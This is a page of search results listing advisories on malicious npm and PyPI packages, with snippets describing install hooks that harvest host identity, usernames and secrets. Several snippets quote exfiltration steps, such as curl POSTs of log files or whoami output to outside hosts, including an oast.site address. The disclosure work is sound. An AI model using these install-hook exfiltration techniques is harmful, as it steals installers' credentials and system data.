2407 matches found
MAL-2026-6972 Malicious code in @vwfs-its/sf-sac-frontend (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 41fd62df844e3fba17cb6200b0c9f2ce518a630677ed96f4cf0349b2a3eb7a3d On npm install, the package's preinstall hook node index.js collects installer host identity — hostname, OS user info, output of whoami and id, shell...
Malicious code in rio-design-tokens (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ed72d8256a1831ef61f01d101c9b9de21db822516cb3b61d1fffd1ef7b3bb0c7 [email protected] is a dependency-confusion attack package. package.json declares preinstall: node index.js, so npm install auto-executes...
MAL-2026-6910 Malicious code in zluri-ad-connector (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1b7a807f066f0255f7480ebd7d445043282260b464b0ef54a32a2d022c93bbf7 The package declares a preinstall hook node index.js that runs automatically on npm install. index.js requires os, dns, https, querystring, and the...
Malicious code in zluri-ad-connector (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1b7a807f066f0255f7480ebd7d445043282260b464b0ef54a32a2d022c93bbf7 The package declares a preinstall hook node index.js that runs automatically on npm install. index.js requires os, dns, https, querystring, and the...
MAL-2026-6760 Malicious code in @adobesign/as-dev-tools (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6752e4d30c584cb5ca6f67265c983257c1531aa306b47ec00b43ddae83fe2532 The package's package.json declares a postinstall lifecycle hook that pipes the output of whoami through curl to a hardcoded Burp Collaborator...
Malicious code in debugcli (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ff9ad8188112d91f0ea673971f4421ca96dc7943ba12d65c7339c1aa75c2226e The package name debugcli shadows the popular debug package, and index.js is a thin re-export module.exports = require'debug' so callers observe...
MAL-2026-6737 Malicious code in epic-internal-tools (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c8936b0c0d22097170c5eb02c9b183611934e59e7a3c97f94e3a269e13f0d4d5 The package.json preinstall script auto-executes on npm install and performs installer-side reconnaissance and credential theft. It collects...
MAL-2026-6791 Malicious code in npm-show-date-proof-strings (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 884f2797ddf6247c906bb97e72b3c0891551b260980811d50c7211ab2ea0bbcf The package's postinstall.js runs on every npm install and collects the installer's username via whoami and os.userInfo, hostname os.hostname, platfo...
MAL-2026-6514 Malicious code in dtxtools (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector de085e4b6d38025a5a0b959b19b1022deaa7525b427e66679b58b6892328297a package.json declares a postinstall lifecycle script that auto-executes on npm install. The hook performs a recursive filesystem search for database...
Malicious code in dttfdsdee (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ae565bed85ec0db27f1ff658c7e9491591ce40edc56f423cd8b1122bc209c69c package.json declares a postinstall script that runs automatically on npm install. The script walks the entire filesystem with find to locate databas...
Malicious code in gx-npm-feature-flags (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7 [email protected] is a dependency-confusion squat max-semver 99.99.99 on a gx--prefixed name to outrank a private internal package that...
Malicious code in dttsdee (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...
Malicious code in dddooo (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...
MAL-2026-6460 Malicious code in dddooo (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...
MAL-2026-6459 Malicious code in easy-string-kit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...
MAL-2026-6249 Malicious code in blinkit-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2ca70b0a6be36daf245deb50dd6b3595a9bfba29c62770e82365152a02832cf8 On npm install, the package's preinstall lifecycle hook runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/ and POSTs the installer...
Malicious code in zomato-sushi (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c package.json declares a preinstall script that runs curl with form-encoded fields carrying the installer's hostname hostname -f, whoami, current...
MAL-2026-6254 Malicious code in zomato-sushi (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c package.json declares a preinstall script that runs curl with form-encoded fields carrying the installer's hostname hostname -f, whoami, current...
MAL-2026-6236 Malicious code in query-profile (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7e5505d198ffea0cc608cbcd89e3d8fbe236f4d4ac532425b0e042c52bf87efe This package's metadata and README openly declare it as a dependency-confusion proof-of-concept that registers a PyPI name referenced in Apple's...
Malicious code in cryptodao-config (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2b5f3b7ec6eecce3d891664f33660a1c612cdd3c6ac99ba52633ef77a2df543c On npm install, the postinstall hook runs node recon.js, which harvests installer-side secrets and POSTs them over HTTPS with TLS certificate...